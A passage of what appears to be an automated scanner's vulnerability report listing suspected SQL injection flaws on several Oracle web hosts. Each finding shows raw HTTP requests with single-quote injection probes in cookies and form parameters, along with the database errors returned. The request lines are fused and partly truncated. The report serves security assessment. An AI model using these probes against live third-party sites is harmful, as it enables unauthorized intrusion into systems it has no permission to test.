GET /ocom/websites/crmoden/sitenavigationfunctions.js HTTP/1.1.com/en/index.htm;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true%00' ; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response 1
HTTP/1.1 404 Not Found82d5c0"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=60+0;age=55;ecid=50158734503839384,0:1)Error Page 404</title>...[SNIP]...
Request 2
GET /ocom/websites/crmoden/sitenavigationfunctions.js HTTP/1.1.com/en/index.htm;q=0.3/education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true%00'' ; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response 2
HTTP/1.1 200 OK"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=120;ecid=49405483139469326,0:1)=SS_GET_PAGE&";////////////////////////////////////////////////////...[SNIP]...
1.25. http://crmondemand.oracle.com/ocom/websites/crmoden/sitenavigationfunctions.js [s_nr cookie]
previous
next
Summary
Severity:
High
Confidence:
Tentative
Host:
http://crmondemand.oracle.com
Path:
/ocom/websites/crmoden/sitenavigationfunctions.js
Issue detail
The s_nr cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_nr cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the s_nr cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /ocom/websites/crmoden/sitenavigationfunctions.js HTTP/1.1.com/en/index.htm;q=0.3%2527 ; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response 1
HTTP/1.1 404 Not Found"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=60+0;age=27;ecid=49474640702841373,0:1)Error Page 404</title>...[SNIP]...
Request 2
GET /ocom/websites/crmoden/sitenavigationfunctions.js HTTP/1.1.com/en/index.htm;q=0.3%2527%2527 ; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON
Response 2
HTTP/1.1 200 OK"-11g Oracle-Web-Cache-11g/11.1.1.3.0 (H;max-age=300+0;age=30;ecid=49938570185253534,0:1)=SS_GET_PAGE&";////////////////////////////////////////////////////...[SNIP]...
1.26. https://irecruitment.oracle.com/OA_HTML/OA.jsp [GSI cookie]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
https://irecruitment.oracle.com
Path:
/OA_HTML/OA.jsp
Issue detail
The GSI cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the GSI cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /OA_HTML/OA.jsp?OAFunc=IRC_VIS_ADV_JOB_SEARCH_PAGE&_ti=209088196&oapc=2&oas=c63Ec25IXJtclVMeE1fbdA.. HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8.oracle.com/OA_HTML/RF.jsp?function_id=1038712&resp_id=23350&resp_appl_id=800&security_group_id=0&lang_code=US¶ms=.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM&oas=1jHHdHLuOzEgg93iaFmTOA..;q=0.3d59bd512084b9e22617766b4768ed0eaa374f5913aa8ef8b3406d22.e3ePbhaKb3qRe3yMb3aMax0Mb40; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; BIGipServergsiap_irecruitment_http=1527616141.5150.0000; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C' ; oracle.uix=0^^GMT-5:00^p; s_cc=true; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/RF.jsp%3Ffunction_id%3D1038712%26resp_id%3D23350%26resp_appl_id%3D800%26security_group_id%3D0%26lang_code%3DUS%26params%3D.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM%26oas%3D1jHHdHLuOzEgg93iaFmTOA..; gpw_e24=https%3A//irecruitment.oracle.com/OA_HTML/RF.jsp%3Ffunction_id%3D1038712%26resp_id%3D23350%26resp_appl_id%3D800%26security_group_id%3D0%26lang_code%3DUS%26params%3D.1VlTZi5hyKHcE3E6mrZaB91phg4LLW-2ZXXJFOuaJdg-6ALqWl2AqDOwJZdQVEM%26oas%3D1jHHdHLuOzEgg93iaFmTOA..; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisHomePG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257Bdocument.location%25253D%252527OA.jsp%25253FOAFunc%25253DIRC_VIS_ADV_JOB_SEARCH_PAGE%252526_ti%25253D209088196%252526oa%2526oidt%253D2%2526ot%253DBUTTON
Response
HTTP/1.1 200 OKd59bd512084b9e22617766b4768ed0eaa374f5913aa8ef8b3406d22.e3ePbhaKb3qRe3yMb3aMax0Mb40; path=/OA_HTML; secure.oracle.com/OA_HTML/OAErrorPage.jspORA-0 6502: PL/SQL: numeric or value error: hex to raw conversion error_CALL&#34;, line 1181_SESSION_...[SNIP]...
1.27. https://shop.oracle.com/pls/ostore/f [p parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
https://shop.oracle.com
Path:
/pls/ostore/f
Issue detail
The p parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the p parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
GET /pls/ostore/f?p=dstore:6:7881107130450135::NO:RP,6:P6_LPI:4508925239811805719874' HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/pls/ostore/f?p=dstore:home:7881107130450135&tz=-5:00;q=0.3=7881107130450135; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_cc=true; s_sq=%5B%5BB%5D%5D; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Ahome%253A7881107130450135%2526tz%253D-5%253A00%7C1318855646397%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Ahome%253A7881107130450135%2526tz%253D-5%253A00%7C1318855646399%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520oracle%25252520store%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//shop.oracle.com/pls/ostore/f%2525253Fp%2525253Ddstore%2525253A6%2525253A7881107130450135%2525253A%2525253ANO%2525253ARP%2525252C6%2525253AP6_LPI%2525253A4508925239811805719%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B
Response
HTTP/1.1 200 OK-10g/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml">...[SNIP]... ORA-0 6502: PL/SQL: numeric or value error: character to number conversion error</div>...[SNIP]...
1.28. https://shop.oracle.com/pls/ostore/f [s_sess cookie]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
https://shop.oracle.com
Path:
/pls/ostore/f
Issue detail
The s_sess cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sess cookie, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of the s_sess cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /pls/ostore/f?p=dstore:product:0::NO:6:P6_LPI,P6_PROD_HIER_ID:4509235234901805719915,4509948309481805720010 HTTP/1.1/pls/ostore/f?p=dstore:product:0::NO:6:P6_LPI,P6_PROD_HIER_ID:4509235234901805719915,4509948309481805720010;q=0.3=7881107130450135; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_sq=%5B%5BB%5D%5D; s_pers=%20gpv_p24%3Dno%2520value%7C1318853882276%3B%20gpw_e24%3Dno%2520value%7C1318853882279%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B%2527
Response 1
HTTP/1.1 200 OK-10g...[SNIP]... ORA-0 1403: no data found_exists...[SNIP]...
Request 2
GET /pls/ostore/f?p=dstore:product:0::NO:6:P6_LPI,P6_PROD_HIER_ID:4509235234901805719915,4509948309481805720010 HTTP/1.1/pls/ostore/f?p=dstore:product:0::NO:6:P6_LPI,P6_PROD_HIER_ID:4509235234901805719915,4509948309481805720010;q=0.3=7881107130450135; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_sq=%5B%5BB%5D%5D; s_pers=%20gpv_p24%3Dno%2520value%7C1318853882276%3B%20gpw_e24%3Dno%2520value%7C1318853882279%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B%2527%2527
Response 2
HTTP/1.1 200 OK-10g...[SNIP]...
1.29. https://shop.oracle.com/pls/ostore/wwv_flow.accept [p_t03 parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
https://shop.oracle.com
Path:
/pls/ostore/wwv_flow.accept
Issue detail
The p_t03 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the p_t03 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
POST /pls/ostore/wwv_flow.accept HTTP/1.1-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/pls/ostore/f?p=dstore:product:0::NO:6:P6_LPI,P6_PROD_HIER_ID:4509235234901805719915,4509948309481805720010;q=0.3=7881107130450135; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_sq=%5B%5BB%5D%5D; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Aproduct%253A0%253A%253ANO%253A6%253AP6_LPI%252CP6_PROD_HIER_ID%253A4509235234901805719915%252C4509948309481805720010%7C1318853885249%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Aproduct%253A0%253A%253ANO%253A6%253AP6_LPI%252CP6_PROD_HIER_ID%253A4509235234901805719915%252C4509948309481805720010%7C1318853885250%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520product%25252520details%25252520%2525253A%25252520oracle%25252520crystal%25252520ball%252526pidt%25253D1%252526oid%25253Djavascript%2525253ASWaddToCart%25252528this%25252529%2525253B%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B_id=6&p_instance=7881107130450135&p_page_submission_id=1395912309489726&p_request=ADD_TO_CART&p_arg_names=206263118184316685&p_t01=Store+Search&f01=2275956057831485281871&f02=11.1.2.1.0&f03=1&p_arg_names=252655103147885539&p_t02=&p_arg_values=0439721E627C30CB548DADA8E65D95BA&p_arg_names=207117723716793227&p_t03=4509235234901805719915' &p_arg_values=A5E94BE6CB06C6C78288A1BC1F3830A4&p_arg_names=250319705164410242&p_t04=4509235234901805719915&p_arg_values=A5E94BE6CB06C6C78288A1BC1F3830A4&p_arg_names=207117929257794851&p_t05=4509816130...[SNIP]...
Response
HTTP/1.1 200 OK-10g/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml">...[SNIP]... ORA-0 6502: PL/SQL: numeric or value error: character to number conversion error</div>...[SNIP]...
1.30. https://shop.oracle.com/pls/ostore/wwv_flow.accept [p_t04 parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
https://shop.oracle.com
Path:
/pls/ostore/wwv_flow.accept
Issue detail
The p_t04 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the p_t04 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
POST /pls/ostore/wwv_flow.accept HTTP/1.1-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/pls/ostore/f?p=dstore:product:0::NO:6:P6_LPI,P6_PROD_HIER_ID:4509235234901805719915,4509948309481805720010;q=0.3=7881107130450135; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_sq=%5B%5BB%5D%5D; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Aproduct%253A0%253A%253ANO%253A6%253AP6_LPI%252CP6_PROD_HIER_ID%253A4509235234901805719915%252C4509948309481805720010%7C1318853885249%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Aproduct%253A0%253A%253ANO%253A6%253AP6_LPI%252CP6_PROD_HIER_ID%253A4509235234901805719915%252C4509948309481805720010%7C1318853885250%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520product%25252520details%25252520%2525253A%25252520oracle%25252520crystal%25252520ball%252526pidt%25253D1%252526oid%25253Djavascript%2525253ASWaddToCart%25252528this%25252529%2525253B%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B_id=6&p_instance=7881107130450135&p_page_submission_id=1395912309489726&p_request=ADD_TO_CART&p_arg_names=206263118184316685&p_t01=Store+Search&f01=2275956057831485281871&f02=...[SNIP]... 8DADA8E65D95BA&p_arg_names=207117723716793227&p_t03=4509235234901805719915&p_arg_values=A5E94BE6CB06C6C78288A1BC1F3830A4&p_arg_names=250319705164410242&p_t04=4509235234901805719915' &p_arg_values=A5E94BE6CB06C6C78288A1BC1F3830A4&p_arg_names=207117929257794851&p_t05=4509816130221805719992&p_arg_values=498C20DC5AC4EBAF85B8E6B2B473B6A4&p_arg_names=207404924623578601&p_t06=1&p_arg_na...[SNIP]...
Response
HTTP/1.1 200 OK-10g/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml">...[SNIP]... ORA-0 6502: PL/SQL: numeric or value error: character to number conversion error</div>...[SNIP]...
1.31. https://shop.oracle.com/pls/ostore/wwv_flow.accept [p_t13 parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
https://shop.oracle.com
Path:
/pls/ostore/wwv_flow.accept
Issue detail
The p_t13 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the p_t13 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
POST /pls/ostore/wwv_flow.accept HTTP/1.1-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/pls/ostore/f?p=dstore:product:0::NO:6:P6_LPI,P6_PROD_HIER_ID:4509235234901805719915,4509948309481805720010;q=0.3=7881107130450135; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_sq=%5B%5BB%5D%5D; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Aproduct%253A0%253A%253ANO%253A6%253AP6_LPI%252CP6_PROD_HIER_ID%253A4509235234901805719915%252C4509948309481805720010%7C1318853885249%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Aproduct%253A0%253A%253ANO%253A6%253AP6_LPI%252CP6_PROD_HIER_ID%253A4509235234901805719915%252C4509948309481805720010%7C1318853885250%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520product%25252520details%25252520%2525253A%25252520oracle%25252520crystal%25252520ball%252526pidt%25253D1%252526oid%25253Djavascript%2525253ASWaddToCart%25252528this%25252529%2525253B%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B_id=6&p_instance=7881107130450135&p_page_submission_id=1395912309489726&p_request=ADD_TO_CART&p_arg_names=206263118184316685&p_t01=Store+Search&f01=2275956057831485281871&f02=...[SNIP]... =6130E111F0804409DCF473ECFD337202&p_arg_names=207419606484914025&p_t12=1&p_arg_values=DC56F6004D1F7C0C2BA5A478BBDE5013&p_arg_names=207480026756751075&p_t13=4509948309481805720010' &p_arg_values=5915CD01B4537EDB4FD2C5CB71DCAEB7&p_arg_names=207483131960828293&p_t14=&p_arg_values=0439721E627C30CB548DADA8E65D95BA&p_arg_names=207483316508833283&p_t15=&p_arg_values=0439721E627C30CB54...[SNIP]...
Response
HTTP/1.1 200 OK-10g/xhtml1/DTD/xhtml1-strict.dtd">/1999/xhtml">...[SNIP]... ORA-0 6502: PL/SQL: numeric or value error: character to number conversion error</div>...[SNIP]...
1.32. https://shop.oracle.com/pls/ostore/wwv_flow.accept [p_t18 parameter]
previous
next
Summary
Severity:
High
Confidence:
Firm
Host:
https://shop.oracle.com
Path:
/pls/ostore/wwv_flow.accept
Issue detail
The p_t18 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the p_t18 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Remediation detail
The application should handle errors gracefully and prevent SQL error messages from being returned in responses.
Request
POST /pls/ostore/wwv_flow.accept HTTP/1.1-urlencoded/xhtml+xml,application/xml;q=0.9,*/*;q=0.8/pls/ostore/f?p=dstore:product:0::NO:6:P6_LPI,P6_PROD_HIER_ID:4509235234901805719915,4509948309481805720010;q=0.3=7881107130450135; s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; s_sq=%5B%5BB%5D%5D; s_pers=%20gpv_p24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Aproduct%253A0%253A%253ANO%253A6%253AP6_LPI%252CP6_PROD_HIER_ID%253A4509235234901805719915%252C4509948309481805720010%7C1318853885249%3B%20gpw_e24%3Dhttps%253A//shop.oracle.com/pls/ostore/f%253Fp%253Ddstore%253Aproduct%253A0%253A%253ANO%253A6%253AP6_LPI%252CP6_PROD_HIER_ID%253A4509235234901805719915%252C4509948309481805720010%7C1318853885250%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doracleglobal%252Coraclestore%253D%252526pid%25253Dostore%2525253A%25252520product%25252520details%25252520%2525253A%25252520oracle%25252520crystal%25252520ball%252526pidt%25253D1%252526oid%25253Djavascript%2525253ASWaddToCart%25252528this%25252529%2525253B%252526ot%25253DA%2526oraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B_id=6&p_instance=7881107130450135&p_page_submission_id=1395912309489726&p_request=ADD_TO_CART&p_arg_names=206263118184316685&p_t01=Store+Search&f01=22759560578314852